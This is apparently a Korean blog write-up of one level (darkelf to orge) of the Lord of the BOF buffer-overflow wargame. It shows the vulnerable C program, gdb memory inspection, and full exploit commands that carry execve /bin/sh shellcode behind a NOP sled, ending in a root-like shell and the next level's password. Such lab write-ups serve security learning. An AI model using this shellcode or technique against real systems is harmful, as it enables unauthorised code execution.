[lob] darkelf -> orge

[darkelf@localhost darkelf]$ cat orge.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orge
        - check argv[0]
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // here is changed!
    if(strlen(argv[0]) != 77){
                printf("argv[0] error\n");
                exit(0);
    }

    // egghunter
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // check the length of argument
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}

ltrace .///////////////////////////////////////////////////////////////////////////o `python -c'print "a"*44+"\x0f\xfc\xff\xbf"'` `python -c'print "\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

0xbffffb8b

0xbffffc50

Type "help" followed by a class name for a list of commands in that class.
Type "help" followed by command name for full documentation.
Command name abbreviations are allowed if unambiguous.
(gdb) x/x $ebp
0xbffffad8:    0x00000000
(gdb) x/x $ebp+0xc
0xbffffae4:    0x00000003
(gdb) x/x $ebp+0x10
0xbffffae8:    0xbffffb04
(gdb) x/x 0xbffffb04
0xbffffb04:    0xbffffbfc
(gdb) x/s 0xbffffbfc
0xbffffbfc:     "/home/darkelf/.", '/' <repeats 61 times>, "o"
(gdb) x/x 0xbffffb08
0xbffffb08:    0xbffffc4a
(gdb) x/s 0xbffffc4a
0xbffffc4a:     "1234"
(gdb) x/x 0xbffffb0b
0xbffffb0b:    0xfffc4fbf
(gdb) x/x 0xbffffb0c
0xbffffb0c:    0xbffffc4f
(gdb) x/s 0xbffffc4f
0xbffffc4f:     "1234"
(gdb)


ltrace /home/darkelf/./////////////////////////////////////////////////////////////o `python -c'print "a"*44+"\x0d\xf4\xfe\xbf"'` `python -c'print "\x90"*100000\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

0xbffffbc3
0xbffffc52

0xbffffaec

[darkelf@localhost darkelf]$ .////////////////////////////////////////////////////////////////////////orge  `python -c'print "a"*44+"\x0d\xf4\xfe\xbf"'` `python -c'print "\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
梢aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
bash$ ls
ls: .: Permission denied
bash$ my-pass
euid = 507
timewalker
bash$

저작자표시비영리동일조건

'공부 > LOB' 카테고리의 다른 글

[lob] troll -> vampire  (0)	2014.07.30
[lob] orge -> troll  (0)	2014.07.30
[lob] darkelf -> orge  (0)	2014.07.30
[lob] wolfman -> darkelf  (0)	2014.07.30
[lob] orc -> wolfman  (0)	2014.07.30
[lob]goblin->orc  (0)	2014.07.30